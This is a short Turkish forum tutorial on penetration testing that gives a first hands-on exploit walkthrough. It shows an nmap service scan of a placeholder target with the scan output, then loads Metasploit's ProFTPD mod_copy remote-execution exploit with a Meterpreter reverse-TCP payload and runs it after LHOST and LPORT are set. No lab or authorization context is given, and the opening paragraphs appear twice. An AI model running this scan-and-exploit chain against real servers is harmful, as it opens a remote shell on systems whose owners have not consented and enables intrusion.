- 18 May 2021
- 44
- 10
Herkese Merhaba,
Hocalarım, kardeşlerim,akranlarım bu benim ilk rehberim olabilecek/doğabilecek hatalar için özür dilerim.
Sızma (Pentesting)
Nasıl yapıldığını bilmeden kendimizi koruyamayız, bunun için ilk exploit kullanımını göstermek istedim. İlk olarak Linux sistemimizden terminali açıyoruz ve Nmap ile port/service taraması yapıyoruz:
Çıktı:
Hedefin 21. Portunda ProFTPD çalıştığından emin olduktan sonra "msfconsole" yazarak metasploit'i açıyoruz, ve
Yazarak exploitimizi seçiyoruz sıra payloadımızda:
Diyerek payloadımızı da seçiyoruz LHOST, LPORT ayarlamalarını yaptıktan sonra "exploit" diyerek çalıştırabiliriz.
Hocalarım, kardeşlerim,akranlarım bu benim ilk rehberim olabilecek/doğabilecek hatalar için özür dilerim.
Sızma (Pentesting)
Nasıl yapıldığını bilmeden kendimizi koruyamayız, bunun için ilk exploit kullanımını göstermek istedim. İlk olarak Linux sistemimizden terminali açıyoruz ve Nmap ile port/service taraması yapıyoruz:
Bash:
sudo nmap -sS -sV targetip
Bash:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp filtered ssh
25/tcp filtered smtp
80/tcp open http Apache httpd (PleskLin)
110/tcp filtered pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
161/tcp filtered snmp
389/tcp filtered ldap
427/tcp filtered svrloc
443/tcp open ssl/http Apache httpd (PleskLin)
445/tcp filtered microsoft-ds
465/tcp filtered smtps
587/tcp filtered submission
873/tcp filtered rsync
3306/tcp filtered mysql
8009/tcp filtered ajp13
8443/tcp open ssl/https-alt sw-cp-server
Bash:
use exploit/unix/ftp/proftpd_modcopy_exec
Bash:
use payload/linux/x64/meterpreter/reverse_tcp